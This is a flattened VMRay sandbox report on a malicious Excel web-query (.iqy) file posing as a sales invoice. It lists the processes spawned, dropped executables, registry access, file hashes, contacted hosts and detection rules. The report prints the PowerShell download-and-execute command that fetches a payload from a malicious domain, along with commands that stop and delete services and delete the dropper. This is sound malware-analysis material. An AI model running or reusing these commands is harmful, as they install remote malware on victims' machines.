VMRay Analyzer Report for Sample #1587234
VMRay Analyzer
2.2.1
URI
95.213.251.149
Resolved_To
Address
95.213.251.149
URI
brembotembo.com
Resolved_To
Process
1
2092
excel.exe
1496
excel.exe
"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
C:\Users\qj4SUKboE\Desktop\
c:\program files\microsoft office\office16\excel.exe
Child_Of
Child_Of
Child_Of
Process
2
2456
msosync.exe
2092
msosync.exe
"C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
C:\Users\qj4SUKboE\Desktop\
c:\program files\microsoft office\office16\msosync.exe
Process
3
1348
msosync.exe
2092
msosync.exe
"C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
C:\Users\qj4SUKboE\Desktop\
c:\program files\microsoft office\office16\msosync.exe
Process
4
2964
cmd.exe
2092
cmd.exe
CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\"))
C:\Users\qj4SUKboE\Desktop\
c:\windows\system32\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
5
2532
powershell.exe
2964
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\"))
C:\Users\qj4SUKboE\Desktop\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Wrote_To
Wrote_To
Read_From
Read_From
Read_From
Read_From
Opened
Opened
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Connected_To
Connected_To
Connected_To
Process
6
2068
cmd_.exe
2532
cmd_.exe
"C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe"
C:\Users\qj4SUKboE\Desktop\
c:\users\qj4suk~1\appdata\local\temp\cmd_.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Read_From
Created
Opened
Opened
Opened
Wrote_To
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Deleted
Opened
Connected_To
Connected_To
Process
7
1200
taskeng.exe
820
taskeng.exe
taskeng.exe {7366205D-AB28-4705-9A68-ED75B1319F38} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:Highest[1]
C:\Windows\system32\
c:\windows\system32\taskeng.exe
Process
8
3056
taskeng.exe
820
taskeng.exe
taskeng.exe {F0BF9717-EB8A-4C23-8803-85A71A393FD9} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:LUA[1]
C:\Windows\system32\
c:\windows\system32\taskeng.exe
Process
10
2948
cmd.exe
2068
cmd.exe
"C:\Windows\System32\cmd.exe" /C net.exe stop ammyy
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
11
2940
cmd.exe
2068
cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete ammyy
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
12
2988
cmd.exe
2068
cmd.exe
"C:\Windows\System32\cmd.exe" /C net.exe stop foundation
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
13
3008
cmd.exe
2068
cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete foundation
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
14
2264
net.exe
2948
net.exe
net.exe stop ammyy
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
15
1344
net.exe
2988
net.exe
net.exe stop foundation
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
16
176
net1.exe
1344
net1.exe
C:\Windows\system32\net1 stop foundation
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\net1.exe
Wrote_To
Opened
Process
17
2360
sc.exe
3008
sc.exe
sc delete foundation
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\sc.exe
Wrote_To
Process
18
1860
net1.exe
2264
net1.exe
C:\Windows\system32\net1 stop ammyy
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\net1.exe
Wrote_To
Opened
Process
19
2916
sc.exe
2940
sc.exe
sc delete ammyy
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\sc.exe
Wrote_To
Process
21
2624
wsus.exe
2068
wsus.exe
C:\ProgramData\Settings\wsus.exe
C:\Users\qj4SUKboE\Desktop\
c:\programdata\settings\wsus.exe
Read_From
Created
Opened
Opened
Opened
Modified_Properties_Of
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Connected_To
Process
22
2656
cmd.exe
2068
cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Deleted
Created
Opened
Opened
Opened
Opened
Opened
Process
23
2688
cmd.exe
2068
cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
C:\Users\qj4SUKboE\Desktop\
c:\windows\syswow64\cmd.exe
Wrote_To
Created
Opened
Opened
Opened
Opened
Opened
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
File
conout$
File
users\qj4sukboe\appdata\local\temp\cmd_.exe
users\qj4sukboe\appdata\local\temp\cmd_.exe
c:\
c:\users\qj4sukboe\appdata\local\temp\cmd_.exe
exe
MD5
3e3d2e9fe0976c4c8d4c6be03f5d7c79
SHA1
b079b7235ac9ce53d564e8e81e1419f870fb7550
SHA256
30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
conin$
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
DNSRecord
brembotembo.com
SocketAddress
brembotembo.com
80
NetworkConnection
HTTP
brembotembo.com
80
URI
brembotembo.com/1.dat
Contains
URI
None
URI
brembotembo.com/doc.xls
Contains
File
programdata\settings\wsus_41a480.tmp
programdata\settings\wsus_41a480.tmp
c:\
c:\programdata\settings\wsus_41a480.tmp
tmp
MD5
192aead1e464431f616fc210ab18a6af
SHA1
84e0756eef6e66bd8cc9a42fee4fa69ab21964ca
SHA256
ac3fb7067fed4e4db651f8261553d379a980eaa8756202b4a8daa8e88299a2ef
File
programdata\settings
programdata\settings
c:\
c:\programdata\settings
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
programdata\settings\wsus.exe
programdata\settings\wsus.exe
c:\
c:\programdata\settings\wsus.exe
exe
MD5
0be249bf01a6b8380ab31aa3f75e62d3
SHA1
1caef216eccbc07949836f814dcd9818a4c75d6d
SHA256
7f61258418b89942aa8e7bf2563ce11a05402d3ccf405a18e3d0a4d7a7f9ee41
File
programdata\ammyy\wmihost.exe
programdata\ammyy\wmihost.exe
c:\
c:\programdata\ammyy\wmihost.exe
exe
File
programdata\ammyy\settings3.bin
programdata\ammyy\settings3.bin
c:\
c:\programdata\ammyy\settings3.bin
bin
File
programdata\foundation\wmites.exe
programdata\foundation\wmites.exe
c:\
c:\programdata\foundation\wmites.exe
exe
File
programdata\foundation\settings3.bin
programdata\foundation\settings3.bin
c:\
c:\programdata\foundation\settings3.bin
bin
File
programdata\foundation1\wmites.exe
programdata\foundation1\wmites.exe
c:\
c:\programdata\foundation1\wmites.exe
exe
File
programdata\foundation1\settings3.bin
programdata\foundation1\settings3.bin
c:\
c:\programdata\foundation1\settings3.bin
bin
File
programdata\microsoft\wsus.exe
programdata\microsoft\wsus.exe
c:\
c:\programdata\microsoft\wsus.exe
exe
File
programdata\microsoft\settings3.bin
programdata\microsoft\settings3.bin
c:\
c:\programdata\microsoft\settings3.bin
bin
File
programdata\microsoft\enc
programdata\microsoft\enc
c:\
c:\programdata\microsoft\enc
File
programdata\ammyy
programdata\ammyy
c:\
c:\programdata\ammyy
File
programdata\foundation
programdata\foundation
c:\
c:\programdata\foundation
File
programdata\foundation1
programdata\foundation1
c:\
c:\programdata\foundation1
Mutex
URI
http://brembotembo.com/load.dat
Contains
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
programdata\settings\wsus.exe
programdata\settings\wsus.exe
c:\
c:\programdata\settings\wsus.exe
exe
File
users\qj4sukboe\desktop\kfwsh6767yuhnr3hunjiweh78&*$y%3uefisgt67yuh*y#$urw
users\qj4sukboe\desktop\kfwsh6767yuhnr3hunjiweh78&*$y%3uefisgt67yuh*y#$urw
c:\
c:\users\qj4sukboe\desktop\kfwsh6767yuhnr3hunjiweh78&*$y%3uefisgt67yuh*y#$urw
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Control
HKEY_CURRENT_USER
netsxuid
52393308
REG_SZ
WinRegistryKey
SYSTEM\CurrentControlSet\services
HKEY_LOCAL_MACHINE
netsxuid
WinRegistryKey
SYSTEM\CurrentControlSet\Control
HKEY_CURRENT_USER
netsxuid
WinRegistryKey
SYSTEM\CurrentControlSet\services
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\services
HKEY_LOCAL_MACHINE
netsxuid
WinRegistryKey
SYSTEM\CurrentControlSet\Control
HKEY_CURRENT_USER
netsxuid
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE
EnableLUA
WinRegistryKey
SYSTEM\CurrentControlSet\services
HKEY_LOCAL_MACHINE
netsxuid
WinRegistryKey
SYSTEM\CurrentControlSet\Control
HKEY_CURRENT_USER
netsxuid
SocketAddress
185.222.202.139
80
TCP
NetworkSocket
185.222.202.139
80
TCP
Contains
File
users\qj4suk~1\appdata\local\temp\cmd_.exe
users\qj4suk~1\appdata\local\temp\cmd_.exe
c:\
c:\users\qj4suk~1\appdata\local\temp\cmd_.exe
exe
File
\device\null
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
File
\device\null
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
Analyzed Sample #1587234
Malware Artifacts
1587234
Sample-ID: #1587234
Job-ID: #1443257
This sample was analyzed by VMRay Analyzer 2.2.1 on a Windows 7 system
100
VTI Score based on VTI Database Version 2.7
Metadata of Sample File #1587234
Submission-ID: #1805193
C:\Users\qj4SUKboE\Desktop\Sales invoice Z12_01 copy.iqy.iqy
iqy
MD5
b9fdcd230f07ac2e62987fd620e42ca8
SHA1
c1973ccf7000a0e45f501cb31ca37e9c10084f62
SHA256
ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c
Opened_By
Metadata of Analysis for Job-ID #1443257
Timeout
False
x86 64-bit
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
win7_64_sp1-mso2016
True
160.291
Windows 7
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "brembotembo.com".
Performs DNS request
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "cmd".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\system32\net.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\system32\sc.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\ProgramData\Settings\wsus.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\system32\cmd.exe".
Creates process
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_av_by_wmi_query
Tries to detect antivirus software via WMI query: "select * from antivirusproduct".
Tries to detect the presence of antivirus software
Process
VTI rule match with VTI rule score 1/5
vmray_overwrite_code
Overwrites code to possibly hide behavior.
Overwrites code
File System
VTI rule match with VTI rule score 2/5
vmray_handle_with_suspicious_files
File "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe" is a known suspicious file.
Associated with suspicious files
File System
VTI rule match with VTI rule score 2/5
vmray_handle_with_suspicious_files
File "c:\programdata\settings\wsus.exe" is a known suspicious file.
Associated with suspicious files
Network
VTI rule match with VTI rule score 3/5
vmray_tcp_out_connection
Outgoing TCP connection to host "185.222.202.139:80".
Connects to remote host
Network
VTI rule match with VTI rule score 4/5
vmray_reputation_url_malicious
URL "brembotembo.com/1.dat" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_reputation_url_malicious
URL "brembotembo.com/doc.xls" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_reputation_url_malicious
URL "http://brembotembo.com/load.dat" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "brembotembo.com/1.dat".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "brembotembo.com/doc.xls".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "http://brembotembo.com/load.dat".
Downloads data
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "brembotembo.com/1.dat".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "brembotembo.com/doc.xls".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "http://brembotembo.com/load.dat".
Connects to HTTP server
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\programdata\settings\wsus.exe".
Drops PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\users\qj4sukboe\appdata\local\temp\cmd_.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\programdata\settings\wsus.exe".
Executes dropped PE file